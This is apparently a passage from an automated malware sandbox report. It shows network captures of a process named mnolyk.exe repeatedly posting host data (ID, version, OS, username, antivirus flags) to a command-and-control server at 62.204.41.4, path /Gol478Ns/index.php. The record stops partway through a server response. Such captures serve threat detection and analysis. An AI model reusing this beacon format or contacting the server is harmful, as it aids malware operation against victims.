                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.798099041 CET435INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      30192.168.2.74975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:04.905747890 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.969631910 CET462INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      300192.168.2.75002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:21.251923084 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.314766884 CET753INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      301192.168.2.75002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:21.493237019 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.558015108 CET754INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      302192.168.2.75002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:21.731774092 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.796478033 CET755INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      303192.168.2.75003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:21.969698906 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.035923004 CET756INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      304192.168.2.75003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:22.219104052 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.288219929 CET757INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      305192.168.2.75003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:22.465404987 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.530270100 CET758INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      306192.168.2.75003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:22.700596094 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.764436960 CET759INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      307192.168.2.75003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:22.947073936 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.012310982 CET760INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      308192.168.2.75003562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:23.185231924 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.251290083 CET761INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      309192.168.2.75003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:23.421958923 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.486078978 CET762INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      31192.168.2.74975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:05.145544052 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.211611986 CET463INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      310192.168.2.75003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:23.652170897 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.715187073 CET763INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      311192.168.2.75003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:23.886375904 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.949320078 CET764INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      312192.168.2.75003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:24.123203039 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.188124895 CET765INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      313192.168.2.75004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:24.355269909 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.418427944 CET766INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      314192.168.2.75004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:24.611334085 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.675154924 CET767INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      315192.168.2.75004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:24.857892990 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.921021938 CET768INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      316192.168.2.75004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:25.122543097 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.187724113 CET769INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
